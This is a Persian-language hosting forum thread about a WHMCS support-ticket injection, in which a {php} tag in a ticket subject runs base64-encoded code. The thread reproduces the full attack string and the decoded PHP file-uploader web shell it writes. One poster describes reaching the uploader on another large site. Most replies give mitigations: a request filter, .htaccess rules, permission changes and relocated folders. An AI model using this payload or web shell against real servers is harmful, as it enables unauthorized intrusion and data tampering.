نمایش نسخه قابل چاپ
سلام الان دو روزه که از طریق یه تیکت هک میشم یه نفر میاد تو سایتم عضو میشه یه تیکت برام میفرسته که در موضوع تیکت یه کد php میزنه بعد راحت میاد داخل whm من جالبه بدونید whmcs من آخرین ورژن و با لایسنس هست کدشو الان ندارم چون یوزرشو حذف کردم تیکتشم حذف شد
به whmcs ریپورت بدید سریع
چه طوری ریپورت بدم؟
این کدی هست که داخل موضوع برام تیکت میکنه
کد:{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}
اگه این طوری باشه که ما نباید آخرین ورژن رو آپدیت کنیم . مشکل امنیتی داره
اینارو ولش یکی لینک ریپورت رو به من بده
این عربا دارن دونه دونه سایتهای ایرانی رو هک میکنن من اولیش نبودم آخریشم نیستم
---------- Post added at 11:34 AM ---------- Previous post was at 11:29 AM ----------
فایل شل رو درون
downloads/b0x.php
میریزه
الان کد رو دیکد کردم دیدم این فایل رو اجرا میکنه
با سلام
حضورتون عرض کنم کنه این مشکل مربوط به ورژن 5 نیست و در ورژن های پایینتر هم مشاهده شده
در حال بررسی هستیم
چه جالب/واسه منم همین اتفاق افتاد اما چون باگ ها پچ شده بود هک نشدیم!نقل قول:
نوشته اصلی توسط maryam1
خب
و اما کار این آقای باهوش 6 ساله از Saudi Arabia Saudinet Saudi Telecom Company چیه ؟
ایشون اومدن با این کد یک آپلودر در مسیر templates_c به نام red.php رایت کردند
به این صورت :
و محتوی $code هم به این شکل هستکد PHP:$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
$fo = fopen("templates_c/red.php","w");
fwrite($fo,$code);
بنابراین ابتدا فایل red.php رو حذف کنید و سپس فایل های دیگر رو به جهت عدم وجود شل چک کنیدکد PHP:<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>
موفق باشید
تمام ورژن ها از این راه هک میشن هنوز هم پچ نشده . هر کی میگه هک نمیشیم بگه تا اطلاعات سایتش رو بهش بدم
نقل قول:
نوشته اصلی توسط m3hdi
مطمئنی اگه این کار رو بکنیم دیگه هک نمیشیم؟
من ریپورت دادم به whmcs شما هم از بخش پشتیبانی پانل خودتون در whmcs این کارو بکنید که سریعتر پیگیری بکنن و پچ امنیتی ارائه بدن.
کسی نگفت هک نمی شیمنقل قول:
نوشته اصلی توسط Masoud.B
شما اگر امکان داره خصوصی با بنده تماس بگیرید
---------- Post added at 12:15 PM ---------- Previous post was at 12:13 PM ----------
نحوه نفوذ رو بنده شرح دادمنقل قول:
نوشته اصلی توسط vps-baran.ir
اگر پرمیشن بندی سرور درست باشه مشکلی پیش نمیاد
به هر حال پچ امنیتی رو باید از whmcs گرفت
موفق باشید
میگم اگه من نمیگفتم ایشالا همه میخواستن یه جوجه عرب هکشون کنه؟
---------- Post added at 12:19 PM ---------- Previous post was at 12:16 PM ----------
الان من چیکار کنم؟
موندم والا
میشه یه کاری کرد که نشه فایل php اینا آپلود بشه؟
یه فایل
htaccess
بسازسم و جلوی آپلود این فایلهارو بگیریم؟
یا سطح دسترسی بعضی پوشه هارو کم کنیم؟
یکی از بچه ها که همین الان در حال مشاهده این تاپیک هست الان همین روش هک رو روی سایت من پیاده کرد چون پرمیشنهای سایت من درست تنظیم شده نتونست کاری بکنه ولی آی پی اونو برداشتم بدم به مدیر وب هاستینگ تالک ببینیم کی بوده که این کارو انجام داده و خواسته به سایت من نفوذ کنه
چه طوری پچ کردید؟نقل قول:
نوشته اصلی توسط dr.saeed
واسه بعضی از کودکان بد آموزی داشته احتمالا این تاپیک
دوست عزیز میشه پرمیسینگ رو به ما هم بفرمایید تا ما هم هک نشیم؟
همیشه باید این تو ذهنمون باشه که اسکریپت هایه این چنینی که با یه لایسنس ساده تهیه میشه راحت دست کاری میشه این اسکریپ های عمومی همیشه در خطر هستند .
برای این منظور شماها باید اینطوری در نظر بگیرید که آره این سیستم امن نیست و میشه راحت شل آپلود اجرا بشه . در این مواقع باید سرورهای شما امنیت بالایی داشته باشه که حتی اجازه ی آپلود و اجرا شدن هیچ نوع شل ( PHP - CGI - PErL ) رو به دوستانه نفوذی ندهد .
به همین منظور پیشنهاد میکنم از سگ های زبده و کار کشته روی سروراتون استفاده کنید تا خوب نگهبانی بدن و در مواقع ضروری پارس کنن .
:))نقل قول:
نوشته اصلی توسط Arte
--------------
داخل فولدرهای downloads - template_c و ... با htaccess جلی اجرای فایل های php را بگیرید . (البته من خودم تست نکردم ببینم واسه سیستم مشکلی پیش میاد یا نه
نکته خیلی مهم : روی پوشه admin پسورد بزارید
کسی هست روی سایت من چک کنه اینو ؟
فکر کنم مشکل رو حل کردم
من همه این کارارو کردم
آقا همه سایت ها این مشکل رو دارم
الان یه سایت بزرگ رو رفتم تو آدرس
/downloads/b0x.php
حالا آدرس سایت بماند دیدم یه آپلودر خوشکل جلوم باز شد
موندم به خدا
i3server - پشتيباني
یکی تست میکنه نتیجه رو به من خبر بده ؟
عجب گرفتاری شده
رو تمام پوه ها دسترسی
php رو بستم باز اون تیکت رو برای خودم فرستادم بعد از ارسال تیکت رفتم آدرس
http://***************.com/downloads/b0x.php
آپلودر اومد جلوم
حالا باید چه کار کنیم
اینجوری که دیگه همه هک میشیم
بچه ها یه راهی بدین
سایت های بزرگ هم همین مشکلو دارن
بزرگترین هاشم راحت هک میشن اینجوری
---------- Post added at 01:23 PM ---------- Previous post was at 01:21 PM ----------
نه مال شمارو تا این تیکت رو زدم این پیغامو داد
Hacking Attempt !
بگو چیکار کردی؟
پیغام داد: Hacking Attempt !نقل قول:
نوشته اصلی توسط rn4j1m1
چه طور این کار رو کردی؟
دوست عزیز کدی که شما قرار دادید شلر رو در میسر template_c میریزهنقل قول:
نوشته اصلی توسط maryam1
شما بگید چه کاری می کنید که شلر رو میبینید تا بشه راهنمایی کرد
من یه تیکت میدم موضوع تیکت رو همون کد میزنم و میفرستم بعد از ارسال میرم به آدرس
http://mahale nasbe whmcs.com/downloads/b0x.php
بعد یه آپلودر میاد جلوم مثل عکس پیوست
فایل پیوست 3870
اون دوستی که مشکلو حل کرده به ما هم بگه ثواب داره
جدا از کاری که من کردم
شما با انتقال فولدر هایی که باید بهشون 777 بدین به خارج از public_html میتونید مشکل رو تا حد خیلی خیلی زیادی حل کنید
Further Security Steps - WHMCS Documentation
سایت من قبل از این کاری که کردم هم بازم امکان نداشت هک بشه
چون دسترسی عمومی به فولدر هایی مثل template_c وجود نداشت
همون کد ؟نقل قول:
نوشته اصلی توسط maryam1
قبل از فرستادن تیکت فایل رو حذف کردید ؟
بله حذف کرده بودم
---------- Post added at 01:38 PM ---------- Previous post was at 01:34 PM ----------
سطح دسترسی فایل downloads رو بردم رو 644 فعلا حل شده مشکل
دوست عزیز نشدا بگو چیکار میکنی بعد از ارسال تیکت این اخطار رو میده؟
کاری که من کردم به نظر خودم یه راه حل بچه گانه هست
خوب من لایسنس دارم و همه ی فایل ها کد شده هست پس من نمیتونشتم خود باگ رو فیکس کنم
پس اومدم توی فایل configuration.php که توی همه ی صفحات انکلود میشه همه ی $_REQUEST ها رو چک کردم
اگه توی هر کدومشون عبارت {php} وجود داشت جلوی ادامه برنامه رو گرفتم و عبارت Hacking Attempt ! رو چاپ کردم
به درخواست دوستان کد رو میذارم
اما به نظر خودم این راه حل درست نیست و موقت هست ! پس از ارائه پچ حتما پاکش کنید
کد زیر رو توی فایل configuration.php اضافه کنید
کد PHP:foreach ($_REQUEST as $value)
{
if(strpos(strtolower($value), "{php}") !== false)
die("Hacking Attempt !");
}
فکر کنم از طریق اچتی اکسس بشه کاری کرد که جلوی آپلود فایل روی یک فولدر گرفته بشه ! باز هم جست و جو می کنیم
rn4j1m1
http://www.webhostingtalk.ir/images/...er-offline.png عزیز به نمونه از این کد نویسی رو بذارید تا ما طبق همون پیش بریم
پست قبلیم رو ویرایش کردم و کد رو گذاشتم
من این تاپیک رو به اکثر سایت های فروش هاست اطلاع دادم
فکر کنم از این طریق خیلی بهتر بشه جلوی نفوذ رو گرفت شما هم یک نگاهی بندازید
Restrict Access by IP
بیشتر توضیح بدهنقل قول:
فکر کنم از این طریق خیلی بهتر بشه جلوی نفوذ رو گرفت شما هم یک نگاهی بندازید
Restrict Access by IP
من سطح دسترسی پوشه دانلود رو آوردم پایین مشکلم حل شده
البته دوستان بگن کم کردن این سطح دسترسی مشکلی ایجاد نمیکنه؟
اگر سرور کانفیگ امنیتی شده باشه خطری تهدید نمی کنهنقل قول:
نوشته اصلی توسط vistavps-co
ممکنه روی هاست های اشتراکی اسکریت های زیادی باشن که داری باگ هستند مدیر سرور که نمی تونه تمامی باگ ها رو فیکس کنه
بهتره بیشتر روی امنیت سرور فو*** کنید
موفق باشید
از این طریق مسدود کردن آی پی روی پوشه ادمین هست و من خودم هنوزتست نکردم این هم متن آموزش
For added security, if your staff use fixed IP addresses, you can add even more protection to your admin area by restricting access to a specific set of IPs. This is done by creating a file with the name .htaccess within your WHMCS admin directory, with the following content:
You can specify as many different allow from lines as you require. Or you can even allow entire IP subnet's by specifying just the first part of an IP, for example: "12.34.". This is called Htaccess IP Restriction.
order deny,allow allow from 12.34.5.67 allow from 98.76.54.32 deny from all
دوستان عزیز
اون هکری که این کارو کرده به نظرم یه بچه بوده فقط !
چون اصلا نیازی به شل نیست
من بدون شل الان میتونم مثلا تمام دیتابیس رو پاک کنم
یا مثالا هر اینویسی رو دلم خواست بزنم پرداخت شده
یا مثلا تمامی عبارت های دیتابیس رو تغییر بدم به "hacked by ..."
این باگ خیلی خیلی خظرناک هست حتی اگه هکر موفق به آپلود شل نشه
بهترین راه اینه که اولا پرمیشن فایل configuration.php رو 444 بزارید.
دوما کد های زیر رو در فایل configuration.php بزارید:
به جای username، نام کاربری هاستتونو بزارید. و همچنین این سه تا فولدر رو از هاست خارج کنید و به مسیری که در بالا گفته شده منتقل کنید. کاهش دادن پرمیشن این سه تا فولدر راهگشا نیست و بعدا مشکلاتی رو ایجاد میکنه.کد PHP:$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
بله درسته ، چون دسترسی در حد اجرای کد php هست نیازی به شل نیست و همون طور که آقای نجیمی گفتند اجرای کامندهایی نظیر mysql ممکن استنقل قول:
نوشته اصلی توسط rn4j1m1